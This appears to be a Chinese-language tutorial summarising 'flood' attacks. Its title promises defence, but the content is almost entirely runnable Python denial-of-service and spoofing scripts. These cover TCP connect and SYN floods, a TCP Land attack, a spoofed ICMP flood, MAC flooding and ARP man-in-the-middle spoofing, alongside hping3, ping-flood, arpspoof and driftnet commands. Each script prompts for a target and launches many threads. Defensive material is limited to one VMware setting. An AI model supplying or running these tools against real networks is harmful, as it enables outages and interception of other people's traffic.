《网络安全中的“泛洪”攻击:揭秘、防范与应对策略》
各类泛洪攻击总结
IPV4泛洪
一、什么是泛洪?
泛洪的基本原理就是基于协议通信,完成大流量高并发操作,导致目标主机各类资源消耗过多而无法提供正常的服务。基于多线程或多进程(MAC地址泛洪,ARP泛洪欺骗)。 (1) 攻击端与目标主机之间能够正常通信。 (2) 目标主机没有配置很好防御措施。
二、使用socket三次握手泛洪
import socket
import threading
def socket_flood(ip, port):
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1) # 设置超时时间为1秒
s.connect((ip, port))
except socket.error:
pass # 忽略连接错误
if __name__ == '__main__':
def is_valid_ip(ip):
parts = ip.split('.')
if len(parts) != 4:
return False
for part in parts:
if not part.isdigit() or not 0 <= int(part) <= 255:
return False
return True
def is_valid_port(port):
try:
port = int(port)
return 0 <= port <= 65535
except ValueError:
return False
target_ip = input("请输入ipv4地址\n")
while not is_valid_ip(target_ip):
target_ip = input("无效的IP地址,请重新输入\n")
target_port = input("请输入port端口号\n")
while not is_valid_port(target_port):
target_port = input("无效的端口号,请重新输入\n")
for i in range(500):
threading.Thread(target=socket_flood, args=(target_ip, int(target_port))).start()
三、使用scapy半连接泛洪
import scapy
from scapy.layers.inet import IP, TCP
from scapy.sendrecv import send
import threading
def scapy_flood(ip, port):
while True:
try:
pkg = IP(dst=ip) / TCP(dport=port, flags='S')
send(pkg, verbose=False)
except Exception as e:
print(f"发送数据包失败: {e}")
break
def is_valid_ip(ip):
parts = ip.split('.')
if len(parts) != 4:
return False
for part in parts:
if not part.isdigit() or not 0 <= int(part) <= 255:
return False
return True
def is_valid_port(port):
try:
port = int(port)
return 0 <= port <= 65535
except ValueError:
return False
if __name__ == '__main__':
target_ip = input("请输入ipv4地址\n")
while not is_valid_ip(target_ip):
target_ip = input("无效的IP地址,请重新输入\n")
target_port = input("请输入port端口号\n")
while not is_valid_port(target_port):
target_port = input("无效的端口号,请重新输入\n")
for i in range(500): # 减少线程数量以避免资源耗尽
threading.Thread(target=scapy_flood, args=(target_ip, int(target_port))).start()
四、使用TCP Land泛洪
import random
import threading
from scapy.layers.inet import IP, TCP
from scapy.sendrecv import send
def TCP_Land(ip, port):
try:
while True:
sport = random.randint(1, 65535)
pkg = IP(src=ip, dst=ip) / TCP(sport=sport, dport=port, flags='S')
send(pkg, verbose=False)
except Exception as e:
print(f"线程 {threading.current_thread().name} 发生错误: {e}")
def is_valid_ip(ip):
parts = ip.split('.')
if len(parts) != 4:
return False
for part in parts:
if not part.isdigit() or not 0 <= int(part) <= 255:
return False
return True
def is_valid_port(port):
try:
port = int(port)
return 0 <= port <= 65535
except ValueError:
return False
if __name__ == '__main__':
target_ip = input("请输入ipv4地址\n")
while not is_valid_ip(target_ip):
target_ip = input("无效的IP地址,请重新输入\n")
target_port = input("请输入port端口号\n")
while not is_valid_port(target_port):
target_port = input("无效的端口号,请重新输入\n")
threads = []
for i in range(50): # 减少线程数量以避免资源耗尽
t = threading.Thread(target=TCP_Land, args=(target_ip, int(target_port)), name=f"Attacker-{i + 1}")
t.start()
threads.append(t)
for t in threads:
t.join()
五、使用ICMP泛洪
import threading
from scapy.layers.inet import IP, ICMP
from scapy.sendrecv import send
def icmp_flood(send_ip, ip):
while True:
pkg = IP(src=send_ip, dst=ip) / ICMP()
send(pkg, verbose=False)
def is_valid_ip(ip):
parts = ip.split('.')
if len(parts) != 4:
return False
for part in parts:
if not part.isdigit() or not 0 <= int(part) <= 255:
return False
return True
if __name__ == '__main__':
target_send_ip = input("请输入发送方ipv4地址\n")
while not is_valid_ip(target_send_ip):
target_send_ip = input("无效的发送方IP地址,请重新输入\n")
target_ip = input("请输入ipv4地址\n")
while not is_valid_ip(target_ip):
target_ip = input("无效的IP地址,请重新输入\n")
threads = []
for i in range(50): # 减少线程数量以避免资源耗尽
t = threading.Thread(target=icmp_flood, args=(target_send_ip, target_ip), name=f"ICMP-Flood-{i + 1}")
t.start()
threads.append(t)
for t in threads:
t.join()
六、ICMP广播风暴
就是把要攻击ipv4设为结尾255
七、使用Ping命令泛洪
1、kali -i命令,可以把每次ping时间间隔设短 2、将ping的数据包设大
eg:ping -i 0.001 -s 2000 [ipv4地址]
八、泛洪工具
1、kali:hping3
eg:hping3 --flood -S --rand-source -p 端口 目标IP
2、Web压力测试
kali:ab eg:ab -n 1000000 -c 1000 目标网址
kali:wrk eg:wrk -c 10000 -d 200s -t 5 目标网址
MAC泛洪
MAC泛洪基本攻击原理
1、定义任意数据包,并生成随机MAC地址,不停的发送该条数据。 2、该条数据则会流向交换机,而此时交换机会发现源MAC地址在MAC表里面不存在。 3、如果发送的数据量很大,则会填满MAC表,导致新的数据包无法添加到mac表里面,此时,理论上来说交换机会进行广播。 4、一旦交换机进行数据广播,则会导致整个局域网的流量全员可见。 5、MAC地址泛洪也存在其他情况,比如交换机崩溃,或者整个局域网无法上网等情况。MAC地址组合数量是,16**12 6、混杂模式:默认情况下,vmware使用的是混杂模式,整个网络通信过程类似于广播,任意网段内的流量均会被其他主机监听。 vmware禁用混杂模式:打开vmx编辑器输入,ethernet0.noPromisc = "TRUE"。
实现mac泛洪
kali 桥接出来,使用macof
python实现
import logging
import threading
# MAC泛洪
import time
from scapy.layers.inet import IP
from scapy.layers.l2 import Ether
from scapy.sendrecv import send
from scapy.volatile import RandMAC, RandIP
# 配置日志记录
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# 定义常量
INTERFACE_NAME = 'Microsoft Wi-Fi Direct Virtual Adapter'
PACKET_RATE = 0.01 # 每秒100个数据包
NUM_THREADS = 5
def mac_flood():
try:
while True:
randmac = RandMAC()
srandip = RandIP()
drandip = RandIP()
# srandip = ".".join(str(random.randint(1, 254)) for _ in range(4))
# drandip = ".".join(str(random.randint(1, 254)) for _ in range(4))
packet = Ether(src=randmac, dst="ff:ff:ff:ff:ff:ff") / IP(src=srandip, dst=drandip)
send(packet, iface=INTERFACE_NAME, verbose=0)
logging.debug(f"Sent packet with src MAC: {randmac}, src IP: {srandip}, dst IP: {drandip}")
time.sleep(PACKET_RATE)
except Exception as e:
logging.error(f"Error in mac_flood thread: {e}")
if __name__ == '__main__':
threads = []
for _ in range(NUM_THREADS):
thread = threading.Thread(target=mac_flood)
thread.daemon = True # 设置为守护线程,主线程结束时自动退出
thread.start()
threads.append(thread)
try:
for thread in threads:
thread.join()
except KeyboardInterrupt:
logging.info("Stopping mac flood attack...")
ARP攻击与欺骗
1、kali安装dsniff(语法,apt-get -y install dsniff),arp -a查看mac。 2、找到被攻击ip与mac,攻击方ip与mac,网关的ip与mac,核心所在,欺骗被攻击者把攻击mac认为网关mac。 1、kali arp泛洪
eg:arpspoof -i eth0 -t 攻击ip 网关ip
2、kali arp欺骗
eg:arpspoof -i eth0 -t 攻击ip 网关ip(需提前输入:echo 1 >> /proc/sys/net/ipv4/ip_forward)
3、kali使用driftnet:安装语法同上。
eg:driftnet -i eth0
使用scapy完成ARP欺骗
1、攻击主机需要欺骗被攻击主机,让被攻击主机把攻击主机视为网关,出口流量可以经过该网关,另外,攻击主机还需要欺骗网关。 让网关认为,入口流量的目的地就是攻击主机。
python实现
import time
import logging
from scapy.layers.l2 import Ether, getmacbyip, ARP
from scapy.sendrecv import sendp
from scapy.volatile import RandMAC
def arp_spoof(target_ip, target_mac, gateway_ip, iface="Microsoft Wi-Fi Direct Virtual Adapter"):
try:
gateway_mac = getmacbyip(gateway_ip)
if not gateway_mac:
logging.error(f"无法获取网关 {gateway_ip} 的 MAC 地址")
return
except Exception as e:
logging.error(f"获取网关 MAC 地址时出错: {e}")
return
# 使用攻击者的实际 MAC 地址
attacker_mac = RandMAC() # 请替换为实际的 MAC 地址
while True:
try:
# op = 1:arp请求 op = 2:arp响应
# 欺骗被攻击主机
packet1 = Ether(src=attacker_mac, dst=target_mac) / ARP(hwsrc=attacker_mac, psrc=gateway_ip, hwdst=target_mac, pdst=target_ip, op=2)
sendp(packet1, iface=iface)
logging.info(f"发送 ARP 响应欺骗被攻击者 {target_ip} 认为网关是 {gateway_ip}")
# 欺骗网关
packet2 = Ether(src=attacker_mac, dst=gateway_mac) / ARP(hwsrc=attacker_mac, psrc=target_ip, hwdst=gateway_mac, pdst=gateway_ip, op=2)
sendp(packet2, iface=iface)
logging.info(f"发送 ARP 响应欺骗网关 {gateway_ip} 认为被攻击者是 {target_ip}")
except Exception as e:
logging.error(f"发送 ARP 包时出错: {e}")
time.sleep(2)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
target_ip = input("请输入被攻击者的 IP 地址: ")
target_mac = input("请输入被攻击者的 MAC 地址: ")
gateway_ip = input("请输入网关的 IP 地址: ")
arp_spoof(target_ip, target_mac, gateway_ip)